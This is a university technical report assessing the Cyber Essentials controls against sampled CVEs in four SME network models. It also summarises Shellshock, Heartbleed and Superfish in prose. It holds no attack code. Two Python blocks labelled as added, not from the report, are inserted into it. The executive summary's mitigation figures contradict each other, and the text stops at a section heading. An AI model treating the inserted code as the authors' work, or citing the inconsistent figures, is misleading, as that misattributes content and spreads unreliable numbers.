
Security Lancaster

CYBER SECURITY CONTROLS EFFECTIVENESS
A Qualitative Assessment of Cyber Essentials

Security Lancaster — Lancaster University

Contributors
Dr Jose M. Such (Principal Investigator)
John Vidler
Tim Seabrook
Prof. Awais Rashid
Security Lancaster, Infolab21, SCC, Lancaster University, Lancaster, LA1 4WA, United Kingdom

Cite as
Such, J. M., Vidler, J., Seabrook, T., Rashid, A. Cyber Security Controls Effectiveness: A Qualitative Assessment of Cyber Essentials. Technical Report SCC-2015-02, Security Lancaster, Lancaster University, 2015.

Acknowledgements
This Cyber Security research project was funded by the UK Government.

Disclaimer
This material is provided for general information purposes only. You should make your own judgement as regards use of this material and seek independent professional advice on your particular circumstances. Neither the publisher nor the author nor any contributors assume any liability to anyone for any loss or damage caused by any error or omission in the work, whether such error or omission is the result of negligence or any other cause.

Contents

Executive Summary 2
Introduction 3
  Aims 3
Methodology 4
  Data Collection 4
  Vulnerabilities 4
  Mitigation Assessment 5
Analysis 6
  Full Vulnerabilities Assessment 6
  Case Studies 6
  Survey Responses 8
Analysis of Cyber Essentials on High Profile Vulnerabilities 10
  "ShellShock" 10
  "Heartbleed" 10
  "Superfish" 10
  Threat Analysis 11
Conclusions 12
  Additional Tools 12
  Cyber Essentials Controls 12
  Recommendations 12
References 13
Cyber Controls Applicability 14
CVE Details 19
Survey Responses 27

Executive Summary

Findings

This report assesses the Cyber Essentials controls' effectiveness in mitigating cyber-threats.

Two-hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.

The aggregated results show that without the Cyber Essentials controls, none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE tools, more than 99% of the vulnerabilities in SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 1/3 of exploits only partially mitigated rely on hardware or software vendors to release patches succinctly and effectively to combat any vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, up until a patch is released there remains a vulnerability in the network. For this reason it should be stressed for SMEs to frequently consider what services or software is installed, whether it is necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials are as such because of fundamental hard-coded flaws in hardware or software that are unable to be updated or patched to a secure state.

Figure 1: Cyber Essentials Aggregated Vulnerability Mitigation Results

Recommendations

Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; it may be recommended that a follow-up study with a wider scope be carried out to investigate the risks from other forms of attack with the use of Cyber Essentials.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that in order to maximise the security of a network it is essential to not only consider the prevention of attacks with the use of tools, but to also ensure that all employees are adequately educated in network security and treated with scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation of integrating Cyber Essentials further with collective security approaches such as The Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 2 of 28

Introduction

Cyber Essentials was introduced as a government funded scheme, first published in April 2014, as an interest of national security to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilize for the mitigation of the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable [form] of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].

The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, either in hardware or software form, is important for them to be fully effective.

Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control: Ensuring only those who should have access to systems have access, and at the appropriate level.

Malware protection: Ensuring that virus and malware protection is installed and is up to date.

Patch management: Ensuring the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.

Figure 2: Cyber Essentials Security Tools

The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered as applicable to all sizes of Enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring your own Device' network setups in scope, as well as Cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not to be considered.

Aims

The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹

To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of SMEs interviewed.

The networks modelled from collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted with the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.


Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper-models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can exploit commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.

Data Collection

In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration it was important to understand how the network is used - where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches and how often updates are rolled out.

Survey

The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 random vulnerabilities have been equally taken from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition for a vulnerability, which they state as:

An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials

To warrant a CVE entry into the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed as to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
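To make the assessment rules above concrete, the following is an added example (not code from the report, whose assessment was carried out by hand and double-vetted) that encodes the applicability rule and the three mitigation outcomes, then runs them over a constructed set of vulnerabilities for one modelled SME with and without the CE controls. The CVE ids, vendors, products and the short control keys are constructed placeholders.

```python
from collections import Counter
from dataclasses import dataclass

# The three outcomes the report assigns to each vulnerability.
MITIGATED = "mitigated"
PARTIAL = "partially mitigated"
NOT_MITIGATED = "not mitigated"

# Short keys (constructed) for the five Cyber Essentials controls.
CE_CONTROLS = frozenset({"firewalls", "secure-config", "access-control",
                         "malware", "patch"})


@dataclass(frozen=True)
class Vulnerability:
    cve: str                 # placeholder id, not a real CVE
    kind: str                # "software" or "hardware"
    vendor: str
    product: str
    patch_available: bool    # has the vendor released a fix yet?
    controls: frozenset      # CE controls that address it; empty = hard-coded flaw


@dataclass(frozen=True)
class SmeNetwork:
    name: str
    software_in_use: frozenset   # software in use or likely in use
    hardware_vendors: frozenset  # vendors of hardware present (like-product rule)
    ce_controls: frozenset       # controls deployed; empty = no Cyber Essentials


def is_applicable(vuln: Vulnerability, net: SmeNetwork) -> bool:
    """Applicability rule from the Mitigation Assessment section."""
    if vuln.kind == "hardware":
        # A hardware flaw applies if the SME uses a like-product from the same vendor.
        return vuln.vendor in net.hardware_vendors
    # A software flaw applies only if that software is in use or likely in use.
    return vuln.product in net.software_in_use


def assess(vuln: Vulnerability, net: SmeNetwork) -> str:
    """Mitigation outcome for one vulnerability on one network."""
    covering = vuln.controls & net.ce_controls
    if not covering:
        # Either no CE controls are deployed, or the flaw is inherent and no
        # control (patching included) can fix it.
        return NOT_MITIGATED
    if covering == {"patch"} and not vuln.patch_available:
        # Only patch management helps, and the vendor has not shipped a fix yet.
        return PARTIAL
    return MITIGATED


def summarise(vulns, net: SmeNetwork) -> dict:
    """Counts and percentages per outcome over the vulnerabilities applicable to net."""
    applicable = [v for v in vulns if is_applicable(v, net)]
    counts = Counter(assess(v, net) for v in applicable)
    total = len(applicable)
    outcomes = (MITIGATED, PARTIAL, NOT_MITIGATED)
    pct = {k: round(100.0 * counts[k] / total, 1) if total else 0.0 for k in outcomes}
    return {"network": net.name, "applicable": total,
            "counts": {k: counts[k] for k in outcomes}, "percent": pct}


# Constructed sample data (placeholder ids and product names, not real CVEs).
SAMPLE_VULNS = [
    Vulnerability("CVE-XXXX-0001", "software", "BrowserCo", "BrowserA", True,
                  frozenset({"patch", "malware"})),
    Vulnerability("CVE-XXXX-0002", "software", "MailCo", "MailServerB", False,
                  frozenset({"patch"})),                # awaiting a vendor patch
    Vulnerability("CVE-XXXX-0003", "hardware", "RouterCo", "R-100", False,
                  frozenset()),                         # hard-coded flaw, unfixable
    Vulnerability("CVE-XXXX-0004", "hardware", "SwitchCo", "S-1", True,
                  frozenset({"secure-config", "firewalls"})),
    Vulnerability("CVE-XXXX-0005", "software", "OfficeCo", "OfficeSuiteC", True,
                  frozenset({"patch"})),
]


def sample_network(with_ce: bool) -> SmeNetwork:
    """One modelled SME, with or without the CE controls in place."""
    return SmeNetwork(
        name="SME (with CE)" if with_ce else "SME (no CE)",
        software_in_use=frozenset({"BrowserA", "MailServerB"}),
        hardware_vendors=frozenset({"RouterCo"}),
        ce_controls=CE_CONTROLS if with_ce else frozenset(),
    )


if __name__ == "__main__":
    for flag in (False, True):
        print(summarise(SAMPLE_VULNS, sample_network(flag)))
```

Without CE every applicable entry is "not mitigated", which is the report's aggregate finding; with CE the unpatched mail server flaw stays "partially mitigated" until its vendor ships a fix, and the hard-coded router flaw stays "not mitigated".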


Analysis

The analysis of data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain their mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed as applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are as such because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Despite any level of security tools being deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary - or if there are more suitable, and potentially more secure, solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate this vulnerability, but as in the Web Development SME case study it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the found cases this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security stand-point, it can be that no level of security tools on top of the network can aid in mitigation - rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme - to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper-models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilizing an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows File Server (SAMBA) server provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides both local HTTP access to the database it runs, as well as having firewall rules put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.


User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 staff based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge Server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed onto the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head - in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge Server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router - this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation - and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain Servers are the most common local service providers, all present in more than 1/3rd of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network - as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents' Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.


Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.


Analysis of CyberEssentials on High ProfileVulnerabilitiesT

he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

“ShellShock”

Also known by the name “BashDoor”, Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.

“Heartbleed”

Appearing in April 2014, the CVE-2014-0160 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
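As an added example (not from the report), the following Python triages `openssl version` banners against the range quoted from the CVE text above, 1.0.1 before 1.0.1g. The hostnames and banners are constructed, and the function and status names are this example's own; it also shows, at the version-string level, why patch management "only partially remedies" the issue: distributions backport the fix without changing the upstream letter, so an in-range banner is a prompt to check the vendor patch level rather than proof of exposure.

```python
"""Triage `openssl version` banners against the Heartbleed-affected range
given in the CVE-2014-0160 text: OpenSSL 1.0.1 before 1.0.1g.

Added example, not from the report. Hostnames and banners are constructed.
"""
import re

# OpenSSL 1.x version strings are major.minor.fix plus an optional patch
# letter, e.g. "1.0.1e". A bare "1.0.1" precedes "1.0.1a".
_BANNER_RE = re.compile(r"^OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)")

AFFECTED_FROM = (1, 0, 1, "")   # first release carrying the Heartbeat extension
FIXED_IN = (1, 0, 1, "g")       # first release with the length check


def parse_openssl_version(banner):
    """Return (major, minor, fix, letters) from one line of `openssl version`."""
    m = _BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError("not an OpenSSL version banner: %r" % banner)
    major, minor, fix, letters = m.groups()
    return int(major), int(minor), int(fix), letters


def _order_key(version):
    # The bare release sorts before any lettered one; a longer suffix ("zb")
    # sorts after a single letter, matching OpenSSL's own ordering.
    major, minor, fix, letters = version
    return (major, minor, fix, len(letters), letters)


def in_heartbleed_range(banner):
    """True when the banner's version lies in [1.0.1, 1.0.1g)."""
    v = _order_key(parse_openssl_version(banner))
    return _order_key(AFFECTED_FROM) <= v < _order_key(FIXED_IN)


def triage(hosts):
    """Map host -> status string for a dict of host -> banner.

    A version inside the range is not proof of exposure: distributions
    backport the fix without bumping the upstream letter (a patched Debian
    wheezy system still reports 1.0.1e), so such hosts are flagged for a
    package-level check rather than declared vulnerable.
    """
    result = {}
    for host, banner in hosts.items():
        try:
            flagged = in_heartbleed_range(banner)
        except ValueError:
            result[host] = "unknown: banner not parseable"
            continue
        if flagged:
            result[host] = "review: version in affected range, confirm vendor patch level"
        else:
            result[host] = "ok: version outside affected range"
    return result


# Constructed sample inventory; hostnames and banners are made up.
SAMPLE_HOSTS = {
    "mail.example.test": "OpenSSL 1.0.1e 11 Feb 2013",
    "web.example.test": "OpenSSL 1.0.1g 7 Apr 2014",
    "legacy.example.test": "OpenSSL 0.9.8y 5 Feb 2013",
    "new.example.test": "OpenSSL 1.0.2 22 Jan 2015",
    "appliance.example.test": "LibreSSL 2.1.3",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_HOSTS).items()):
        print("%-24s %s" % (host, status))
```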

“Superfish”

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software, which essentially breaks the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they then have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

